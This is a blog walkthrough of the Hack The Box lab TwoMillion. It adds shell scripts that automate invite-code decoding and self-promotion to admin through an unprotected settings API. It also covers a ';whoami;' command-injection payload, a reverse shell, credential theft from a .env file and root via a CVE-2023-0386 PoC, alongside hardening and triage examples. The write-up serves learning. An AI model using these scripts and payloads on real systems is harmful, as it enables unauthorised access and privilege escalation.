Hack The Box | TwoMillion Walkthrough

Abdulrhman
5 min read · Feb 22, 2024


Hi!!

Welcome to my first blog, so please forgive any grammar errors.


Before starting, add 2million.htb to /etc/hosts so the hostname resolves to the target IP.

Enumeration

Nmap scan

nmap -T4 -v -p- -sCV <target_ip>
nmap scan

We got two open ports: port 22 running SSH and port 80 running HTTP.

Directory Fuzzing

I like to use dirsearch.

While it runs, I browse the web app and do manual enumeration in parallel.

dirsearch -u http://2million.htb/
dirsearch

There is no /robots.txt and no other interesting endpoint in the results.

So I returned to manual enumeration and found one more endpoint, /invite.

Finding invite endpoint

Navigating through the site, I found that I need an invite code to sign up for an account.

I went back to /invite because it seemed interesting. Looking at the page source, we find a function that sends a POST request to /api/v1/invite/verify to check whether the entered invite code is valid.

Invite endpoint source code

In addition to that function, the page loads a JavaScript file, /js/inviteapi.min.js.

Looking at the file, we find obfuscated JavaScript.

obfuscated code

Deobfuscating it gives the following code.

// Sends the entered invite code to the verify endpoint (this is the function
// referenced from the /invite page source).
function verifyInviteCode(code) {
    var formData = {
        "code": code
    };
    $.ajax({
        type: "POST",
        dataType: "json",
        data: formData,
        url: '/api/v1/invite/verify',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}

// Not referenced from the /invite page: asks the API how invite codes are generated.
function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/how/to/generate',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}

There are two functions in the code. The first one we already saw in the /invite page source; it verifies an invite code. The second one is not used by the page at all, and it calls /api/v1/invite/how/to/generate, which tells us how to generate an invite code.

So let's use curl to request the /api/v1/invite/how/to/generate endpoint.

curl -X POST http://2million.htb/api/v1/invite/how/to/generate
curl request

The response is ROT13-encoded (the response itself says so in its enctype field). Decoding it gives:

In order to generate the invite code, make a POST request to \/api\/v1\/invite\/generate

So it is telling us to use the /api/v1/invite/generate endpoint to generate an invite code.

So let’s use curl again to request to this endpoint.

curl -X POST http://2million.htb/api/v1/invite/generate
curl request

This time we got a base64-encoded string, so let's decode it.

echo "NFdMUjQtMDkwRUotTDVEM0UtV0NGWUE=" | base64 -d

And finally we have an invite code. The one I used, LAB4B-8ROKZ-LOZGM-YQ4ZC, came from a different request, since each call to the endpoint generates a new code. So let's go and sign up for an account.
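The whole invite-code discovery chain (ROT13 hint, then base64-encoded code) as a small POSIX shell script. This is an added example, not code from the original post: the two sample JSON bodies below are constructed in the shape the API returns and are not captured output, the field extraction assumes the values contain no embedded quotes, and the live mode (set TARGET=2million.htb) runs the same two curl requests shown above.

```shell
#!/bin/sh
# Added example: offline reproduction of the invite-code decoding steps.
# Constructed sample responses (same shape as the real API, not captured output).
HINT_SAMPLE='{"0":200,"success":1,"data":{"data":"Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \/ncv\/i1\/vaivgr\/trarengr","enctype":"ROT13"}}'
CODE_SAMPLE='{"0":200,"success":1,"data":{"code":"NFdMUjQtMDkwRUotTDVEM0UtV0NGWUE=","format":"encoded"}}'

# ROT13 is a fixed substitution, not encryption: tr shifts every letter by 13.
rot13() {
  tr 'A-Za-z' 'N-ZA-Mn-za-m'
}

# Pull the string value of key $1 out of a flat JSON body without jq.
# Assumption: the value contains no embedded double quotes.
json_field() {
  sed -n "s/.*\"$1\":\"\([^\"]*\)\".*/\1/p"
}

# $1: body of POST /api/v1/invite/how/to/generate -> the decoded hint,
# with the JSON-escaped slashes (\/) turned back into plain slashes.
decode_hint() {
  printf '%s' "$1" | json_field data | rot13 | sed 's#\\/#/#g'
}

# $1: body of POST /api/v1/invite/generate -> the usable invite code.
decode_code() {
  printf '%s' "$1" | json_field code | base64 -d
}

if [ -n "${TARGET:-}" ]; then
  # Live mode: the same two requests the walkthrough makes with curl.
  hint=$(curl -s -X POST "http://$TARGET/api/v1/invite/how/to/generate")
  echo "hint: $(decode_hint "$hint")"
  body=$(curl -s -X POST "http://$TARGET/api/v1/invite/generate")
  echo "invite code: $(decode_code "$body")"
else
  echo "hint: $(decode_hint "$HINT_SAMPLE")"
  echo "invite code: $(decode_code "$CODE_SAMPLE")"
fi
```

Without TARGET the script decodes the constructed samples; the sample code decodes to 4WLR4-090EJ-L5D3E-WCFYA, which is what the base64 string quoted above contains.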

Once logged in, I used dirsearch again alongside manual enumeration and found an endpoint, /home/access, which generates and downloads VPN files.

I found nothing else, so I decided to test the API responsible for generating and downloading the VPN files.

There is nothing special in the .ovpn file. Requesting /api only showed the version of the API in use.

Requesting /api/v1 was the surprise: it lists all the API endpoints.

requesting /api/v1 endpoint

Something stands out: there are admin API endpoints. Let's check whether they are accessible to a non-admin user.

I started by requesting /api/v1/admin/auth, which reports whether the current user is an admin.

admin check

As expected, I'm not an admin.

Another interesting endpoint is /api/v1/admin/settings/update. It returns errors until the request is shaped correctly: the method must be PUT, the Content-Type header must be application/json, and the JSON body must contain email and is_admin. Nothing in the endpoint checks that the caller is already an admin, so a normal user can set is_admin on their own account, which is a broken access control bug.

After sending that request with my own email and is_admin set to 1, I got no errors, so my user should now be an admin.

Becoming admin

Let's confirm by requesting /api/v1/admin/auth again.

admin check
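The admin escalation as a POSIX shell script, an added example rather than the post's own commands. It assumes the app's session cookie is named PHPSESSID, that /api/v1/admin/auth answers with a JSON body containing "message":true or "message":false, and that TARGET, SESSION and EMAIL come from the environment; the JSON builder assumes the e-mail contains no double quotes.

```shell
#!/bin/sh
# Added example: promote the current account via the unprotected settings endpoint.
# Assumptions: PHPSESSID session cookie; auth check returns "message":true/false.

# Body for PUT /api/v1/admin/settings/update: our own e-mail plus is_admin=1.
settings_update_body() {
  printf '{"email":"%s","is_admin":1}' "$1"
}

# Return 0 when an /api/v1/admin/auth body says we are admin.
is_admin_response() {
  case "$1" in
    *'"message":true'*) return 0 ;;
    *) return 1 ;;
  esac
}

check_admin() {
  curl -s -b "PHPSESSID=$SESSION" "http://$TARGET/api/v1/admin/auth"
}

promote_to_admin() {
  curl -s -X PUT \
    -H 'Content-Type: application/json' \
    -b "PHPSESSID=$SESSION" \
    -d "$(settings_update_body "$EMAIL")" \
    "http://$TARGET/api/v1/admin/settings/update"
}

# Live flow, only when the environment is set (TARGET=2million.htb SESSION=... EMAIL=...).
if [ -n "${TARGET:-}" ] && [ -n "${SESSION:-}" ] && [ -n "${EMAIL:-}" ]; then
  echo "before: $(check_admin)"
  echo "update: $(promote_to_admin)"
  after=$(check_admin)
  echo "after:  $after"
  if is_admin_response "$after"; then echo "we are admin now"; fi
else
  echo "request body would be: $(settings_update_body "user@example.com")"
fi
```

The three environment variables are the target host, the PHPSESSID value copied from the browser after registering, and the e-mail of the registered account.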

Foothold

Now that I'm admin, let's look at the last admin endpoint, /api/v1/admin/vpn/generate, which was not accessible to non-admin users.

Generating vpn as admin

Nothing special!!

So I tried some injection payloads and, as I expected, the endpoint is vulnerable to command injection: putting ;whoami; in the username parameter executed the command on the server, and from there I got a reverse shell as www-data.
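Why a username of ;whoami; runs a command: an added example, not the box's backend code (the page does not show it). It models the generic pattern of splicing user input into a command string that a shell re-parses, next to the hardened form that passes the value as its own argument, plus an allowlist check; the payload and the printf "command" are constructed for illustration.

```shell
#!/bin/sh
# Added example: command injection through string-built commands, and the fix.

# Vulnerable: the username is interpolated into the command text, so a ';'
# in it terminates our command and starts the attacker's.
gen_vpn_vulnerable() {
  sh -c "printf 'client: %s\n' $1"
}

# Hardened: the username travels as a separate argv element ("$1" inside the
# child shell), so metacharacters are never re-parsed.
gen_vpn_hardened() {
  sh -c 'printf "client: %s\n" "$1"' sh "$1"
}

# Defence in depth: accept only an allowlist of characters before the value
# gets anywhere near a command.
valid_username() {
  case "$1" in
    ''|*[!A-Za-z0-9_.-]*) return 1 ;;
    *) return 0 ;;
  esac
}

PAYLOAD='x; echo INJECTED'   # constructed payload, same shape as ";whoami;"

echo "--- vulnerable (two lines: the second is the injected command's output)"
gen_vpn_vulnerable "$PAYLOAD"
echo "--- hardened (payload stays a literal string)"
gen_vpn_hardened "$PAYLOAD"
if valid_username "$PAYLOAD"; then echo "allowlist: accepted"; else echo "allowlist: rejected"; fi
```

Run it as-is: the vulnerable function prints INJECTED on its own line, the hardened one prints the payload verbatim, and the allowlist rejects it.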

Lateral Movement

Listing the files in the current directory, I found a readable .env file. It looked interesting, and reading it gave me credentials for the admin user.

admin credentials

So I logged in over SSH with those credentials.

After login, the banner says the user has mail.

ssh

So let's check /var/mail/admin.

Linux kernel exploit

The mail mentions a CVE affecting the Linux kernel's OverlayFS/FUSE handling. A little searching on Google turns up the CVE: CVE-2023-0386.

I decided to use this GitHub repo: https://github.com/sxlmnwb/CVE-2023-0386

I transferred the files, followed the PoC, and got root.
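Before copying a PoC onto a host it is worth checking that its preconditions hold. The script below is an added example, not from the post or the PoC repository: CVE-2023-0386 needs unprivileged user namespaces (to mount OverlayFS as a non-root user), FUSE, and a kernel without the fix, which landed in mainline 6.2. Distributions backported the fix to older kernel lines, so the version comparison is a heuristic, not proof of exploitability; the /proc knobs it reads are the Debian/Ubuntu one (unprivileged_userns_clone) and the generic max_user_namespaces limit.

```shell
#!/bin/sh
# Added example: quick triage for CVE-2023-0386 preconditions (heuristic only).

# Return 0 when dotted version $1 is lower than $2; suffixes like
# "-76-generic" are stripped, missing components count as 0.
version_lt() {
  a="$(printf '%s' "$1" | sed 's/[^0-9.].*//')."
  b="$(printf '%s' "$2" | sed 's/[^0-9.].*//')."
  i=1
  while :; do
    x=$(printf '%s' "$a" | cut -d. -f"$i")
    y=$(printf '%s' "$b" | cut -d. -f"$i")
    if [ -z "$x" ] && [ -z "$y" ]; then return 1; fi   # equal
    if [ "${x:-0}" -lt "${y:-0}" ]; then return 0; fi
    if [ "${x:-0}" -gt "${y:-0}" ]; then return 1; fi
    i=$((i + 1))
  done
}

# Unprivileged user namespaces: Debian/Ubuntu knob (absent upstream, where
# they are allowed by default) and the generic namespace limit.
userns_enabled() {
  [ "$(cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null || echo 1)" = 1 ] &&
  [ "$(cat /proc/sys/user/max_user_namespaces 2>/dev/null || echo 1)" != 0 ]
}

fuse_available() {
  [ -e /dev/fuse ] || grep -qw fuse /proc/filesystems 2>/dev/null
}

triage() {
  k=$(uname -r)
  if version_lt "$k" 6.2; then
    echo "kernel $k predates the mainline fix (6.2); check distro patches"
  else
    echo "kernel $k is 6.2 or newer"
  fi
  if userns_enabled; then echo "unprivileged user namespaces: enabled"; else echo "unprivileged user namespaces: disabled"; fi
  if fuse_available; then echo "FUSE: available"; else echo "FUSE: not available"; fi
}

if [ "${1:-}" = "--live" ]; then
  triage
else
  # Offline demonstration of the comparator on a constructed kernel string.
  if version_lt "5.15.70-generic" 6.2; then echo "5.15.70-generic < 6.2"; fi
fi
```

Run it with --live on the target (as the low-privileged user) to see the three checks; without arguments it only demonstrates the version comparator.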

root

Conclusion

I hope you liked the walkthrough. I'm waiting for your comments.

This was great fun!
